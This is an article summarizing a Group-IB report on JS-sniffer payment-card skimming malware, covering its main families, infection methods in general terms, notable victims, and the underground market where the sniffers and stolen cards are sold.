Group-IB is committed to analyzing the darknet market behind JS-sniffers including its monetization methods, infrastructure and more. According to this report, JS-sniffers developers have been able to make millions of dollars from this malware’s activities.
E-Commerce Market Security Threats
The first report on e-commerce cybercrime came from RiskIQ and Flashpoint researchers that found the first instances of JS-script criminal activity. They traced JS-script cybercrime activity to a group of 12 cybercriminal organizations which they named MageCart.
Group-IB went a step further to analyze these JS-sniffers and was able to gain access to the groups’ source codes, cybercrime tools, administrative panels and other aspects of their infrastructure. The Group-IB report is titled” Crime without punishment: In-depth analysis of JS-sniffers”, and it features in-depth information on 38 unique JS-sniffer’ families with lengthy descriptions that can be seen by Group-IB Threat Intelligence customers.
Previously, malware analysts deemed the JS-sniffers threat to be an insignificant one that didn’t require in-depth investigation. But, after some time, the JS-Sniffers threat showed itself to be a considerable risk to online shoppers, as evidenced by its ability to infect the British Airways mobile app and website. It also compromised 380,000 Ticketmaster users whose payment data was stolen by JS-Sniffers developers. International active wear Apparel Company Fila was also a victim of the JS-sniffers threat when 5,600 of their customers’ data was compromised.
According to Group-IB, the JS-sniffers threat puts payment systems, end users, e-commerce companies and even banks at risk of losing data to unscrupulous criminals. Unfortunately, this is an understudied problem, which means perpetrators will almost always get away with stealing online users’ identity, data, and money.
A JS-sniffer is similar to a credit card skimmer, a device that can be installed in an ATM for the purposes of capturing bank card details. Similarly, a JS-sniffer uses a special code to intercept sensitive user data such as passwords, user names, addresses, payment card numbers and more.
Once the hackers have stolen the information they can sell it to other wrongdoers on the darknet. The typical price for a stolen card can be anything from $1 to $15 depending on how “valuable” it is. Research shows that most of the underground forums where JS-sniffer cards are put up for sale are made up of Russian-speaking individuals.
JS-sniffers developers apparently make thousands of dollars per month from selling cards and other online user data. WebRank JS-sniffers alone attract 250,000 visitors to their website every day, and they often see a conversion rate of 2,500 shoppers per day. This means that WebRank makes $2,500 to $12,500 per day, and this translates to $75,000 to $375,000 per month. If you think that’s bad, consider this; WebRank is rated third in the list of the most profitable JS-sniffers. MagentoName and CoffeMokko top the list with over 440,000 visitors per day each.
How Does It Work?
According to the Group-IB report, more than half of the 2,440 JS-sniffers infected websites were infiltrated by MagentoName family. Developers in the JS-sniffer family use an older Magento CMS to insert malicious code into Magento CMS websites. About 13% or so of the attacks are done by WebRank JS-sniffers family, which operates by infecting third-party sites which are then used as Trojan horses to infect the targeted websites with the malicious code.
A further 11% of the infections happen courtesy of the CoffeMokko family, which steals payment information through complicated scripts. These scripts are specifically designed to take information from payment forms that have the JS-sniffer’s code already embedded in them.
Some of the most compromised payment systems include PayPal, Sage Pay, eWAY, Verisign, Authorize.net, USAePay, Stripe and more. Each JS-sniffer family will test and modify the script if needed so that it works flawlessly on each payment system.
The JS-sniffers which have been discovered thus far seem to all have the same end-goal; to steal payment information from website management systems such as Magento, WordPress, WooCommerce, Shopify, OpenCart and others.
The JS-sniffer families which have been identified include MagentoName, PreMage, GetBilling, Qoogle, FakeCDN and even PostEval. JS-sniffers like WebRank and G-Analytics are universal, which means they can be stealthily inserted into any website.
Interestingly enough, the Group-IB researchers found that there’s a fair amount of competition going on between these different JS-sniffer families. Apparently, each one is able to detect and remove competitor JS-sniffers and replace them with their own code.
Most of the time, competing JS-sniffer families will use the other’s “body” to steal all the data it has collected thus far and send it to its own gate. This is a common practice from WebRank specifically, but many are now able to modify their JS-sniffer attacks so that they’re difficult to even detect.
For instance, ReactGet and ImageID are notoriously hard to detect because they only activate when a user finishes their transaction, which is often too late to properly investigate. CoffeMokko and a few others have designed unique JS-sniffers to suit every infection, which means they only use it once on a single website never to be repeated again.
Another distinctive JS-sniffer family is G-Analytics, which uses a website’s HTML as the gateway through which to insert malicious code. They also do this with the PHP scripts that are found on the server side of the e-commerce website payment page. This is a stealthy technique that makes it even harder to detect this JS-sniffer family’s activities as they are being carried out. On the other hand, G-Analytics and ImageID have a way of accurately imitating and hiding behind uQuery, Google Analytics and other legit services in order to infiltrate e-commerce websites and get user information.
JS-sniffer attacks usually happen according to a multi-tiered approach. Group-IB analysts found that cybercriminals do not stop at inserting JS-sniffer infections into the website, but can also create fake payment forms that look like the real thing. Through this method, the JS-sniper developer is able to deter the user from paying with a PayPal account and to use a credit card instead, by displaying a fake message that says “this payment option is currently unavailable.”
The JS-Sniffer Market
The JS-sniffer market has grown almost at the same rate as the e-commerce industry and it’s characterized by complex relationships between buyers and sellers. JS-sniffer is used by the cybercriminal group which initially created it as well as a number of other JS-sniffer families who rent it as a service. As such, it’s safe to assume that there is a large number of cybercriminal groups that are currently using the JS-sniffer attack.
A JS-sniffer goes for $250 to $5,000 and it’s available for sale in underground forums. Certain services provide partnerships as well, which entails one party (the customer) providing a compromised online store in exchange for a share in the resulting profits. On the other hand, the JS-sniffer developer provides the customer with an administrative panel, tech support and hosting servers from which to operate without being detected.
Due to the complicated nature of relationships on the darket, it’s difficult to pinpoint which group is responsible for the crimes. But, Group-IB indicators show that the three JS-sniffer families are to blame for much of the ruckus. The best news to come out of the Group-IB report is a list of recommendations on what to do if you or your organization ever falls pretty to JS-sniffer attack. This goes for bankers, online shoppers, e-commerce stores, payment systems etc.
Plus, Group-IB and other organizations are still hard at work conducting further research into the JS-sniffer phenomenon and new developments on the threat can be found on the Group-IB Threat Intelligence system.